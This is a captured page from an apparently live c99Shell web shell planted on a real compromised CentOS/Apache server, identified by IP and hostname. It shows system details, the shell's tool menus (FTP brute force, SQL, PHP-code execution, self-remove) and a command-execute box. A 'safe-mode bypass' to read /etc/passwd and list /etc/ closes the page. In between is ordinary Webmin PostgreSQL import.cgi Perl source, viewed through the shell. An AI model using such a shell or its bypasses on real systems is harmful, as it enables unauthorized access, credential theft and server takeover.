110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /usr/libexec/webmin/postgresql/ drwxr-xr-x Free 50.93 GB of 127.8 GB (39.85%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


#!/usr/bin/perl
# import.cgi
# Import data from a text file

require './postgresql-lib.pl';
&ReadParseMime();
&can_edit_db($in{'db'}) || &error($text{'dbase_ecannot'});
&error_setup($text{'import_err'});

if ($in{'mode'}) {
    # From uploaded file
    $in{'upload'} || &error($text{'import_eupload'});
    $in{'upload_filename'} =~ /([^\/\\\s]+)$/ ||
        &error($text{'import_eupload'});
    $file = &transname($1);
    open(TEMP, ">$file");
    print TEMP $in{'upload'};
    close(TEMP);
    $need_unlink = 1;
    &ui_print_header(undef, $text{'import_title'}, "");
    print "$text{'import_uploadout'}<p>\n";
    }
else {
    # From local file
    -r $in{'file'} || &error($text{'import_efile'});
    $file = $in{'file'};
    &ui_print_header(undef, $text{'import_title'}, "");
    print &text('import_fileout', "<tt>$in{'file'}</tt>"),"<p>\n";
    }

if (!$in{'delete'}) {
    $data = &execute_sql($in{'db'},
        "select * from ".&quote_table($in{'table'}));
    foreach $r (@{$data->{'data'}}) {
        $done{join("/", @$r)}++;
        }
    }

# Read the file
$skip = 0;
open(FILE, $file);
while(<FILE>) {
    s/\r|\n//g;
    next if (!/\S/);
    local @row;
    if ($in{'format'} == 0) {
        # Quoted and comma-separated
        s/\\\"/\0/g;
        while(/^,?"([^"]*)"(.*)/) {
            $field = $1;
            $_ = $2;
            $field =~ s/\0/"/g;
            push(@row, $field);
            }
        }
    elsif ($in{'format'} == 1) {
        # Just comma-separated
        s/\\,/\0/g;
        @row = split(/,/, $_);
        foreach my $r (@row) {
            $r =~ s/\0/,/g;
            }
        }
    elsif ($in{'format'} == 2) {
        # Tab separated
        @row = split(/\t/, $_);
        }
    if (!@row) {
        print &text('import_erow', "<tt>$_</tt>"),"<p>\n";
        goto failed;
        }
    if ($in{'ignore'} && $done{join("/", @row)}++) {
        # Skip duplicate
        $skip++;
        next;
        }
    push(@rv, \@row);
    }

# Empty the table, if requested
if ($in{'delete'}) {
    &execute_sql_logged($in{'db'}, "delete from ".
                       &quote_table($in{'table'}));
    }

# Add the rows
@str = &table_structure($in{'db'}, $in{'table'});
foreach $r (@rv) {
    @sets = map { "?" } @str;
    $cmd = "insert into ".&quote_table($in{'table'})." values (".
           join(",", @sets).")";
    &execute_sql_logged($in{'db'}, $cmd, @$r);
    }
print &text('import_done', scalar(@rv), $skip),"<p>\n";

&webmin_log("import", undef, $in{'db'}, { 'mode' => $in{'mode'},
                      'file' => $in{'file'} });

failed:
unlink($file) if ($need_unlink);

&ui_print_footer("exec_form.cgi?db=$in{'db'}&mode=import", $text{'exec_return'},
         "edit_dbase.cgi?db=$in{'db'}", $text{'dbase_return'},
         "", $text{'index_return'});

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Command execute ::
Enter:	Select: